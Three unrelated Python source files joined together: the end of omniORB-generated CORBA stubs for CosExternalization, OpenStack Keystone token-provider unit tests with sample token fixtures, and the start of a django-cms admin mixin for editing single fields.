del ContextAlreadyRegistered
# interface Stream
_0_CosExternalization._d_Stream = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosExternalization/Stream:1.0", "Stream")
omniORB.typeMapping["IDL:omg.org/CosExternalization/Stream:1.0"] = _0_CosExternalization._d_Stream
_0_CosExternalization.Stream = omniORB.newEmptyClass()
class Stream (_0_CosLifeCycle.LifeCycleObject):
_NP_RepositoryId = _0_CosExternalization._d_Stream[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosExternalization.Stream = Stream
_0_CosExternalization._tc_Stream = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_Stream)
omniORB.registerType(Stream._NP_RepositoryId, _0_CosExternalization._d_Stream, _0_CosExternalization._tc_Stream)
# Stream operations and attributes
Stream._d_externalize = ((omniORB.typeMapping["IDL:omg.org/CosStream/Streamable:1.0"], ), (), None)
Stream._d_internalize = ((omniORB.typeMapping["IDL:omg.org/CosLifeCycle/FactoryFinder:1.0"], ), (omniORB.typeMapping["IDL:omg.org/CosStream/Streamable:1.0"], ), {_0_CosLifeCycle.NoFactory._NP_RepositoryId: _0_CosLifeCycle._d_NoFactory, _0_CosStream.StreamDataFormatError._NP_RepositoryId: _0_CosStream._d_StreamDataFormatError})
Stream._d_begin_context = ((), (), {_0_CosExternalization.ContextAlreadyRegistered._NP_RepositoryId: _0_CosExternalization._d_ContextAlreadyRegistered})
Stream._d_end_context = ((), (), None)
Stream._d_flush = ((), (), None)
# Stream object reference
class _objref_Stream (_0_CosLifeCycle._objref_LifeCycleObject):
_NP_RepositoryId = Stream._NP_RepositoryId
def __init__(self, obj):
_0_CosLifeCycle._objref_LifeCycleObject.__init__(self, obj)
def externalize(self, *args):
return self._obj.invoke("externalize", _0_CosExternalization.Stream._d_externalize, args)
def internalize(self, *args):
return self._obj.invoke("internalize", _0_CosExternalization.Stream._d_internalize, args)
def begin_context(self, *args):
return self._obj.invoke("begin_context", _0_CosExternalization.Stream._d_begin_context, args)
def end_context(self, *args):
return self._obj.invoke("end_context", _0_CosExternalization.Stream._d_end_context, args)
def flush(self, *args):
return self._obj.invoke("flush", _0_CosExternalization.Stream._d_flush, args)
omniORB.registerObjref(Stream._NP_RepositoryId, _objref_Stream)
_0_CosExternalization._objref_Stream = _objref_Stream
del Stream, _objref_Stream
# Stream skeleton
__name__ = "CosExternalization__POA"
class Stream (_0_CosLifeCycle__POA.LifeCycleObject):
_NP_RepositoryId = _0_CosExternalization.Stream._NP_RepositoryId
_omni_op_d = {"externalize": _0_CosExternalization.Stream._d_externalize, "internalize": _0_CosExternalization.Stream._d_internalize, "begin_context": _0_CosExternalization.Stream._d_begin_context, "end_context": _0_CosExternalization.Stream._d_end_context, "flush": _0_CosExternalization.Stream._d_flush}
_omni_op_d.update(_0_CosLifeCycle__POA.LifeCycleObject._omni_op_d)
Stream._omni_skeleton = Stream
_0_CosExternalization__POA.Stream = Stream
omniORB.registerSkeleton(Stream._NP_RepositoryId, Stream)
del Stream
__name__ = "CosExternalization"
# interface StreamFactory
_0_CosExternalization._d_StreamFactory = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosExternalization/StreamFactory:1.0", "StreamFactory")
omniORB.typeMapping["IDL:omg.org/CosExternalization/StreamFactory:1.0"] = _0_CosExternalization._d_StreamFactory
_0_CosExternalization.StreamFactory = omniORB.newEmptyClass()
class StreamFactory :
_NP_RepositoryId = _0_CosExternalization._d_StreamFactory[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosExternalization.StreamFactory = StreamFactory
_0_CosExternalization._tc_StreamFactory = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_StreamFactory)
omniORB.registerType(StreamFactory._NP_RepositoryId, _0_CosExternalization._d_StreamFactory, _0_CosExternalization._tc_StreamFactory)
# StreamFactory operations and attributes
StreamFactory._d_create = ((), (omniORB.typeMapping["IDL:omg.org/CosExternalization/Stream:1.0"], ), None)
# StreamFactory object reference
class _objref_StreamFactory (CORBA.Object):
_NP_RepositoryId = StreamFactory._NP_RepositoryId
def __init__(self, obj):
CORBA.Object.__init__(self, obj)
def create(self, *args):
return self._obj.invoke("create", _0_CosExternalization.StreamFactory._d_create, args)
omniORB.registerObjref(StreamFactory._NP_RepositoryId, _objref_StreamFactory)
_0_CosExternalization._objref_StreamFactory = _objref_StreamFactory
del StreamFactory, _objref_StreamFactory
# StreamFactory skeleton
__name__ = "CosExternalization__POA"
class StreamFactory (PortableServer.Servant):
_NP_RepositoryId = _0_CosExternalization.StreamFactory._NP_RepositoryId
_omni_op_d = {"create": _0_CosExternalization.StreamFactory._d_create}
StreamFactory._omni_skeleton = StreamFactory
_0_CosExternalization__POA.StreamFactory = StreamFactory
omniORB.registerSkeleton(StreamFactory._NP_RepositoryId, StreamFactory)
del StreamFactory
__name__ = "CosExternalization"
# interface FileStreamFactory
_0_CosExternalization._d_FileStreamFactory = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosExternalization/FileStreamFactory:1.0", "FileStreamFactory")
omniORB.typeMapping["IDL:omg.org/CosExternalization/FileStreamFactory:1.0"] = _0_CosExternalization._d_FileStreamFactory
_0_CosExternalization.FileStreamFactory = omniORB.newEmptyClass()
class FileStreamFactory :
_NP_RepositoryId = _0_CosExternalization._d_FileStreamFactory[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosExternalization.FileStreamFactory = FileStreamFactory
_0_CosExternalization._tc_FileStreamFactory = omniORB.tcInternal.createTypeCode(_0_CosExternalization._d_FileStreamFactory)
omniORB.registerType(FileStreamFactory._NP_RepositoryId, _0_CosExternalization._d_FileStreamFactory, _0_CosExternalization._tc_FileStreamFactory)
# FileStreamFactory operations and attributes
FileStreamFactory._d_create = (((omniORB.tcInternal.tv_string,0), ), (omniORB.typeMapping["IDL:omg.org/CosExternalization/Stream:1.0"], ), {_0_CosExternalization.InvalidFileNameError._NP_RepositoryId: _0_CosExternalization._d_InvalidFileNameError})
# FileStreamFactory object reference
class _objref_FileStreamFactory (CORBA.Object):
_NP_RepositoryId = FileStreamFactory._NP_RepositoryId
def __init__(self, obj):
CORBA.Object.__init__(self, obj)
def create(self, *args):
return self._obj.invoke("create", _0_CosExternalization.FileStreamFactory._d_create, args)
omniORB.registerObjref(FileStreamFactory._NP_RepositoryId, _objref_FileStreamFactory)
_0_CosExternalization._objref_FileStreamFactory = _objref_FileStreamFactory
del FileStreamFactory, _objref_FileStreamFactory
# FileStreamFactory skeleton
__name__ = "CosExternalization__POA"
class FileStreamFactory (PortableServer.Servant):
_NP_RepositoryId = _0_CosExternalization.FileStreamFactory._NP_RepositoryId
_omni_op_d = {"create": _0_CosExternalization.FileStreamFactory._d_create}
FileStreamFactory._omni_skeleton = FileStreamFactory
_0_CosExternalization__POA.FileStreamFactory = FileStreamFactory
omniORB.registerSkeleton(FileStreamFactory._NP_RepositoryId, FileStreamFactory)
del FileStreamFactory
__name__ = "CosExternalization"
#
# End of module "CosExternalization"
#
__name__ = "CosExternalization_idl"
_exported_modules = ( "CosExternalization", )
# The end.
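# Editor's illustrative sketch (not produced by omniidl): typical client-side
# use of the stubs above.  'orb', 'ior' and 'some_streamable' are assumed to
# come from the application.
#
#     factory = orb.string_to_object(ior)._narrow(
#         _0_CosExternalization.FileStreamFactory)
#     stream = factory.create("objects.dat")   # may raise InvalidFileNameError
#     stream.externalize(some_streamable)
#     stream.flush()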
|
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from keystone import config
from keystone import exception
from keystone.openstack.common import timeutils
from keystone import tests
from keystone.tests import default_fixtures
from keystone import token
from keystone.token.providers import pki
CONF = config.CONF
FUTURE_DELTA = datetime.timedelta(seconds=CONF.token.expiration)
CURRENT_DATE = timeutils.utcnow()
SAMPLE_V2_TOKEN = {
"access": {
"trust": {
"id": "abc123",
"trustee_user_id": "123456"
},
"serviceCatalog": [
{
"endpoints": [
{
"adminURL": "http://localhost:8774/v1.1/01257",
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"internalURL": "http://localhost:8774/v1.1/01257",
"publicURL": "http://localhost:8774/v1.1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "nova",
"type": "compute"
},
{
"endpoints": [
{
"adminURL": "http://localhost:9292",
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"internalURL": "http://localhost:9292",
"publicURL": "http://localhost:9292",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "glance",
"type": "image"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8776/v1/01257",
"id": "077d82df25304abeac2294004441db5a",
"internalURL": "http://localhost:8776/v1/01257",
"publicURL": "http://localhost:8776/v1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "volume",
"type": "volume"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8773/services/Admin",
"id": "b06997fd08414903ad458836efaa9067",
"internalURL": "http://localhost:8773/services/Cloud",
"publicURL": "http://localhost:8773/services/Cloud",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "ec2",
"type": "ec2"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8080/v1",
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"internalURL": "http://localhost:8080/v1/AUTH_01257",
"publicURL": "http://localhost:8080/v1/AUTH_01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "swift",
"type": "object-store"
},
{
"endpoints": [
{
"adminURL": "http://localhost:35357/v2.0",
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"internalURL": "http://localhost:5000/v2.0",
"publicURL": "http://localhost:5000/v2.0",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "keystone",
"type": "identity"
}
],
"token": {
"expires": "2013-05-22T00:02:43.941430Z",
"id": "ce4fc2d36eea4cc9a36e666ac2f1029a",
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
},
"user": {
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova",
"roles": [
{
"name": "_member_"
},
{
"name": "admin"
}
],
"roles_links": [],
"username": "nova"
}
}
}
SAMPLE_V3_TOKEN = {
"token": {
"catalog": [
{
"endpoints": [
{
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:35357/v2.0"
},
{
"id": "446e244b75034a9ab4b0811e82d0b7c8",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
},
{
"id": "47fa3d9f499240abb5dfcf2668f168cd",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
}
],
"id": "26d7541715a44a4d9adad96f9872b633",
"type": "identity",
},
{
"endpoints": [
{
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "4fa9620e42394cb1974736dce0856c71",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "9673687f9bc441d88dec37942bfd603b",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:9292"
}
],
"id": "d27a41843f4e4b0e8cf6dac4082deb0d",
"type": "image",
},
{
"endpoints": [
{
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8080/v1"
},
{
"id": "43bef154594d4ccb8e49014d20624e1d",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
},
{
"id": "e63b5f5d7aa3493690189d0ff843b9b3",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
}
],
"id": "a669e152f1104810a4b6701aade721bb",
"type": "object-store",
},
{
"endpoints": [
{
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "869b535eea0d42e483ae9da0d868ebad",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "93583824c18f4263a2245ca432b132a6",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
}
],
"id": "7f32cc2af6c9476e82d75f80e8b3bbb8",
"type": "compute",
},
{
"endpoints": [
{
"id": "b06997fd08414903ad458836efaa9067",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8773/services/Admin"
},
{
"id": "411f7de7c9a8484c9b46c254fb2676e2",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
},
{
"id": "f21c93f3da014785854b4126d0109c49",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
}
],
"id": "b08c9c7d4ef543eba5eeb766f72e5aa1",
"type": "ec2",
},
{
"endpoints": [
{
"id": "077d82df25304abeac2294004441db5a",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "875bf282362c40219665278b4fd11467",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "cd229aa6df0640dc858a8026eb7e640c",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
}
],
"id": "5db21b82617f4a95816064736a7bec22",
"type": "volume",
}
],
"expires_at": "2013-05-22T00:02:43.941430Z",
"issued_at": "2013-05-21T00:02:43.941473Z",
"methods": [
"password"
],
"project": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "01257",
"name": "service"
},
"roles": [
{
"id": "9fe2ff9ee4384b1894a90878d3e92bab",
"name": "_member_"
},
{
"id": "53bff13443bd4450b97f978881d47b18",
"name": "admin"
}
],
"user": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova"
},
"OS-TRUST:trust": {
"id": "abc123",
"trustee_user_id": "123456",
"trustor_user_id": "333333",
"impersonation": False
}
}
}
SAMPLE_V2_TOKEN_WITH_EMBEDED_VERSION = {
"access": {
"trust": {
"id": "abc123",
"trustee_user_id": "123456"
},
"serviceCatalog": [
{
"endpoints": [
{
"adminURL": "http://localhost:8774/v1.1/01257",
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"internalURL": "http://localhost:8774/v1.1/01257",
"publicURL": "http://localhost:8774/v1.1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "nova",
"type": "compute"
},
{
"endpoints": [
{
"adminURL": "http://localhost:9292",
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"internalURL": "http://localhost:9292",
"publicURL": "http://localhost:9292",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "glance",
"type": "image"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8776/v1/01257",
"id": "077d82df25304abeac2294004441db5a",
"internalURL": "http://localhost:8776/v1/01257",
"publicURL": "http://localhost:8776/v1/01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "volume",
"type": "volume"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8773/services/Admin",
"id": "b06997fd08414903ad458836efaa9067",
"internalURL": "http://localhost:8773/services/Cloud",
"publicURL": "http://localhost:8773/services/Cloud",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "ec2",
"type": "ec2"
},
{
"endpoints": [
{
"adminURL": "http://localhost:8080/v1",
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"internalURL": "http://localhost:8080/v1/AUTH_01257",
"publicURL": "http://localhost:8080/v1/AUTH_01257",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "swift",
"type": "object-store"
},
{
"endpoints": [
{
"adminURL": "http://localhost:35357/v2.0",
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"internalURL": "http://localhost:5000/v2.0",
"publicURL": "http://localhost:5000/v2.0",
"region": "RegionOne"
}
],
"endpoints_links": [],
"name": "keystone",
"type": "identity"
}
],
"token": {
"expires": "2013-05-22T00:02:43.941430Z",
"id": "ce4fc2d36eea4cc9a36e666ac2f1029a",
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
},
"user": {
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova",
"roles": [
{
"name": "_member_"
},
{
"name": "admin"
}
],
"roles_links": [],
"username": "nova"
}
},
'token_version': 'v2.0'
}
SAMPLE_V3_TOKEN_WITH_EMBEDED_VERSION = {
"token": {
"catalog": [
{
"endpoints": [
{
"id": "02850c5d1d094887bdc46e81e1e15dc7",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:35357/v2.0"
},
{
"id": "446e244b75034a9ab4b0811e82d0b7c8",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
},
{
"id": "47fa3d9f499240abb5dfcf2668f168cd",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:5000/v2.0"
}
],
"id": "26d7541715a44a4d9adad96f9872b633",
"type": "identity",
},
{
"endpoints": [
{
"id": "aaa17a539e364297a7845d67c7c7cc4b",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "4fa9620e42394cb1974736dce0856c71",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:9292"
},
{
"id": "9673687f9bc441d88dec37942bfd603b",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:9292"
}
],
"id": "d27a41843f4e4b0e8cf6dac4082deb0d",
"type": "image",
},
{
"endpoints": [
{
"id": "7bd0c643e05a4a2ab40902b2fa0dd4e6",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8080/v1"
},
{
"id": "43bef154594d4ccb8e49014d20624e1d",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
},
{
"id": "e63b5f5d7aa3493690189d0ff843b9b3",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8080/v1/AUTH_01257"
}
],
"id": "a669e152f1104810a4b6701aade721bb",
"type": "object-store",
},
{
"endpoints": [
{
"id": "51934fe63a5b4ac0a32664f64eb462c3",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "869b535eea0d42e483ae9da0d868ebad",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
},
{
"id": "93583824c18f4263a2245ca432b132a6",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8774/v1.1/01257"
}
],
"id": "7f32cc2af6c9476e82d75f80e8b3bbb8",
"type": "compute",
},
{
"endpoints": [
{
"id": "b06997fd08414903ad458836efaa9067",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8773/services/Admin"
},
{
"id": "411f7de7c9a8484c9b46c254fb2676e2",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
},
{
"id": "f21c93f3da014785854b4126d0109c49",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8773/services/Cloud"
}
],
"id": "b08c9c7d4ef543eba5eeb766f72e5aa1",
"type": "ec2",
},
{
"endpoints": [
{
"id": "077d82df25304abeac2294004441db5a",
"interface": "admin",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "875bf282362c40219665278b4fd11467",
"interface": "internal",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
},
{
"id": "cd229aa6df0640dc858a8026eb7e640c",
"interface": "public",
"region": "RegionOne",
"url": "http://localhost:8776/v1/01257"
}
],
"id": "5db21b82617f4a95816064736a7bec22",
"type": "volume",
}
],
"expires_at": "2013-05-22T00:02:43.941430Z",
"issued_at": "2013-05-21T00:02:43.941473Z",
"methods": [
"password"
],
"project": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "01257",
"name": "service"
},
"roles": [
{
"id": "9fe2ff9ee4384b1894a90878d3e92bab",
"name": "_member_"
},
{
"id": "53bff13443bd4450b97f978881d47b18",
"name": "admin"
}
],
"user": {
"domain": {
"id": "default",
"name": "Default"
},
"id": "f19ddbe2c53c46f189fe66d0a7a9c9ce",
"name": "nova"
},
"OS-TRUST:trust": {
"id": "abc123",
"trustee_user_id": "123456",
"trustor_user_id": "333333",
"impersonation": False
}
},
'token_version': 'v3.0'
}
def create_v2_token():
return {
"access": {
"token": {
"expires": timeutils.isotime(CURRENT_DATE + FUTURE_DELTA),
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
}
}
}
SAMPLE_V2_TOKEN_EXPIRED = {
"access": {
"token": {
"expires": timeutils.isotime(CURRENT_DATE),
"issued_at": "2013-05-21T00:02:43.941473Z",
"tenant": {
"enabled": True,
"id": "01257",
"name": "service"
}
}
}
}
def create_v3_token():
return {
"token": {
'methods': [],
"expires_at": timeutils.isotime(CURRENT_DATE + FUTURE_DELTA),
"issued_at": "2013-05-21T00:02:43.941473Z",
}
}
SAMPLE_V3_TOKEN_EXPIRED = {
"token": {
"expires_at": timeutils.isotime(CURRENT_DATE),
"issued_at": "2013-05-21T00:02:43.941473Z",
}
}
SAMPLE_MALFORMED_TOKEN = {
"token": {
"bogus": {
"no expiration data": None
}
}
}
class TestTokenProvider(tests.TestCase):
def setUp(self):
super(TestTokenProvider, self).setUp()
self.load_backends()
def test_get_token_version(self):
self.assertEqual(
token.provider.V2,
self.token_provider_api.get_token_version(SAMPLE_V2_TOKEN))
self.assertEqual(
token.provider.V2,
self.token_provider_api.get_token_version(
SAMPLE_V2_TOKEN_WITH_EMBEDED_VERSION))
self.assertEqual(
token.provider.V3,
self.token_provider_api.get_token_version(SAMPLE_V3_TOKEN))
self.assertEqual(
token.provider.V3,
self.token_provider_api.get_token_version(
SAMPLE_V3_TOKEN_WITH_EMBEDED_VERSION))
self.assertRaises(token.provider.UnsupportedTokenVersionException,
self.token_provider_api.get_token_version,
'bogus')
def test_token_format_provider_mismatch(self):
self.config_fixture.config(group='signing', token_format='UUID')
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
try:
token.provider.Manager()
            raise Exception(
                'expecting UnexpectedError on token provider misconfiguration')
except exception.UnexpectedError:
pass
self.config_fixture.config(group='signing', token_format='PKI')
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
try:
token.provider.Manager()
            raise Exception(
                'expecting UnexpectedError on token provider misconfiguration')
except exception.UnexpectedError:
pass
        # should be OK as token_format and provider align
self.config_fixture.config(group='signing', token_format='PKI')
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
token.provider.Manager()
self.config_fixture.config(group='signing', token_format='UUID')
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
token.provider.Manager()
def test_default_token_format(self):
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.PKI_PROVIDER)
def test_uuid_token_format_and_no_provider(self):
self.config_fixture.config(group='signing', token_format='UUID')
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.UUID_PROVIDER)
def test_default_providers_without_token_format(self):
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
token.provider.Manager()
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
token.provider.Manager()
def test_unsupported_token_format(self):
self.config_fixture.config(group='signing', token_format='CUSTOM')
self.assertRaises(exception.UnexpectedError,
token.provider.Manager.get_token_provider)
def test_uuid_provider(self):
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.UUID_PROVIDER)
def test_provider_override_token_format(self):
self.config_fixture.config(
group='token',
provider='keystone.token.providers.pki.Test')
self.assertEqual(token.provider.Manager.get_token_provider(),
'keystone.token.providers.pki.Test')
self.config_fixture.config(group='signing', token_format='UUID')
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.UUID_PROVIDER)
self.config_fixture.config(group='signing', token_format='PKI')
self.config_fixture.config(group='token',
provider=token.provider.PKI_PROVIDER)
self.assertEqual(token.provider.Manager.get_token_provider(),
token.provider.PKI_PROVIDER)
self.config_fixture.config(group='signing', token_format='CUSTOM')
self.config_fixture.config(group='token',
provider='my.package.MyProvider')
self.assertEqual(token.provider.Manager.get_token_provider(),
'my.package.MyProvider')
def test_provider_token_expiration_validation(self):
self.assertRaises(exception.TokenNotFound,
self.token_provider_api._is_valid_token,
SAMPLE_V2_TOKEN_EXPIRED)
self.assertRaises(exception.TokenNotFound,
self.token_provider_api._is_valid_token,
SAMPLE_V3_TOKEN_EXPIRED)
self.assertRaises(exception.TokenNotFound,
self.token_provider_api._is_valid_token,
SAMPLE_MALFORMED_TOKEN)
self.assertEqual(
None,
self.token_provider_api._is_valid_token(create_v2_token()))
self.assertEqual(
None,
self.token_provider_api._is_valid_token(create_v3_token()))
def test_uuid_provider_no_oauth_fails_oauth(self):
self.load_fixtures(default_fixtures)
self.config_fixture.config(group='token',
provider=token.provider.UUID_PROVIDER)
driver = token.provider.Manager().driver
driver.oauth_api = None
self.assertRaises(exception.Forbidden,
driver.issue_v3_token,
self.user_foo['id'], ['oauth1'])
class TestPKIProvider(object):
def setUp(self):
super(TestPKIProvider, self).setUp()
from keystoneclient.common import cms
self.cms = cms
from keystone.common import environment
self.environment = environment
old_cms_subprocess = cms.subprocess
self.addCleanup(setattr, cms, 'subprocess', old_cms_subprocess)
old_env_subprocess = environment.subprocess
self.addCleanup(setattr, environment, 'subprocess', old_env_subprocess)
self.cms.subprocess = self.target_subprocess
self.environment.subprocess = self.target_subprocess
reload(pki) # force module reload so the imports get re-evaluated
def test_get_token_id_error_handling(self):
# cause command-line failure
self.config_fixture.config(group='signing',
keyfile='--please-break-me')
provider = pki.Provider()
token_data = {}
self.assertRaises(exception.UnexpectedError,
provider._get_token_id,
token_data)
class TestPKIProviderWithEventlet(TestPKIProvider, tests.TestCase):
def setUp(self):
# force keystoneclient.common.cms to use eventlet's subprocess
from eventlet.green import subprocess
self.target_subprocess = subprocess
super(TestPKIProviderWithEventlet, self).setUp()
class TestPKIProviderWithStdlib(TestPKIProvider, tests.TestCase):
def setUp(self):
# force keystoneclient.common.cms to use the stdlib subprocess
import subprocess
self.target_subprocess = subprocess
super(TestPKIProviderWithStdlib, self).setUp()
|
|
# -*- coding: utf-8 -*-
from cms.models.placeholderpluginmodel import PlaceholderReference
from cms.utils.urlutils import admin_reverse
from django.contrib.admin.helpers import AdminForm
from django.utils.decorators import method_decorator
import json
from django.views.decorators.clickjacking import xframe_options_sameorigin
from cms.constants import PLUGIN_COPY_ACTION, PLUGIN_MOVE_ACTION
from cms.exceptions import PluginLimitReached
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.plugin_pool import plugin_pool
from cms.utils import get_cms_setting
from cms.utils.compat.dj import force_unicode
from cms.utils.plugins import requires_reload, has_reached_plugin_limit
from django.contrib.admin import ModelAdmin
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.template.defaultfilters import force_escape, escapejs
from django.utils.translation import ugettext as _
from django.conf import settings
from django.views.decorators.http import require_POST
import warnings
from django.template.response import TemplateResponse
from django.contrib.admin.util import get_deleted_objects
from django.core.exceptions import PermissionDenied
from django.db import router
from django.http import HttpResponseRedirect
from cms.utils import copy_plugins, permissions, get_language_from_request
from cms.utils.i18n import get_language_list
from cms.utils.transaction import wrap_transaction
class FrontendEditableAdminMixin(object):
frontend_editable_fields = []
def get_urls(self):
"""
Register the url for the single field edit view
"""
from django.conf.urls import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns(
'',
pat(r'edit-field/([0-9]+)/([a-z\-]+)/$', self.edit_field),
)
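        # A sketch of the resulting URL (object id, language and field name are
        # hypothetical): .../edit-field/42/en/?edit_fields=<frontend editable field>
        # The view name follows "<app_label>_<module_name>_edit_field".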
return url_patterns + super(FrontendEditableAdminMixin, self).get_urls()
def _get_object_for_single_field(self, object_id, language):
        # Quick and dirty way to retrieve objects for django-hvad;
        # a cleaner implementation will extend this method in a child mixin.
try:
return self.model.objects.language(language).get(pk=object_id)
except AttributeError:
return self.model.objects.get(pk=object_id)
def edit_field(self, request, object_id, language):
obj = self._get_object_for_single_field(object_id, language)
opts = obj.__class__._meta
saved_successfully = False
cancel_clicked = request.POST.get("_cancel", False)
raw_fields = request.GET.get("edit_fields")
fields = [field for field in raw_fields.split(",") if field in self.frontend_editable_fields]
if not fields:
context = {
'opts': opts,
'message': force_unicode(_("Field %s not found")) % raw_fields
}
return render_to_response('admin/cms/page/plugin/error_form.html', context, RequestContext(request))
if not request.user.has_perm("%s_change" % self.model._meta.module_name):
context = {
'opts': opts,
'message': force_unicode(_("You do not have permission to edit this item"))
}
return render_to_response('admin/cms/page/plugin/error_form.html', context, RequestContext(request))
        # Dynamically creates the form class with only the requested fields
        # enabled
form_class = self.get_form(request, obj, fields=fields)
if not cancel_clicked and request.method == 'POST':
form = form_class(instance=obj, data=request.POST)
if form.is_valid():
form.save()
saved_successfully = True
else:
form = form_class(instance=obj)
